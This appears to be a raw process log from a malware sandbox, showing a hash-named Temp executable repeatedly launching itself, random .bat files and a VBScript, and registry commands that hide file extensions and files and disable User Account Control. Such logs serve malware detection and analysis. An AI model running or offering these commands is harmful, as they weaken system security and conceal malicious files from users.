cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IUUQowkg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KoAEEkUY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "12446986863839385-3942799-12026598087946042901658254267-1761493411173105642"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\paoEQMsU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "269869885-9812314091114697695565818423-16944278001649652427506178408-822787897"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1696071902-709837720872262950716770532-3226660972009823601-1663249727-1573704184"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rmUgUsMM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Pwoscook.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11960796851092270340-1749045846-920097807-6731434221095135844-1077441289-1006952972"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1524848191154849030-1932816146-1914663191-2095671234349439722139034310-935404897"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uYkocAkM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AuQkUQIg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-194418085848526560877740705-8667673-581739682-1287424169-1357383102-1363066888"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tYsYAkww.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-144052521-186001243786594904-1762721545-1212872668-12030301691285726988-1204668539"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PwoIoccw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1141522045-1624710450-88646891917443169911203256133255627685-1043325550-1623658915"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2067852541-8275723351717606121644136246-1566037557-34404950-344023644-834880824"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1055162969-21093698881819767096-20829634787546510314635965062341364741676004098"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XqUoIMQY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UwwsEAYM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "36003577-822232477798561986-1763104491-714788973-1297655852693502264257153998"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OwQwcIgY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1376705544-211637970233174387-663430307728543586856986747-10315294671051966996"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1383289705-80537007810188069901721936059252735355971553891795361171-1492897337"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1319542776-374779536-201854105-19520884461806047129213032446435941551-1834574271"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ewIsUwwo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1379173920262228559810166139-857556405-1385913541-652851520-6005214691408321615"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-77634842141397794211763024491008597777339116553-1954706124-135455050-1921296695"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "521462220596274073-931815496877606179719643981-1032387596176173758197692285"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGYMAIIs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vaUwIAgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VOQwggcY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jqkscQAc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-7597006431639225702-1673462234-3057914372044557163-1590921161318021825399423330"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VKIcYkcI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "48661695-570454498942293989125187048144331221176614338-1004273857601013157"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "127850386419561030901712551225-834804077427833168772012491192627450676653587"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ySYEAEow.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KUoQMswA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-800541130-1164841657-172018901511260562088793640638296462104904784111230971406"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1830072767-122997395670699997069001237-1043845226-1079128588-10432024951438400711"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

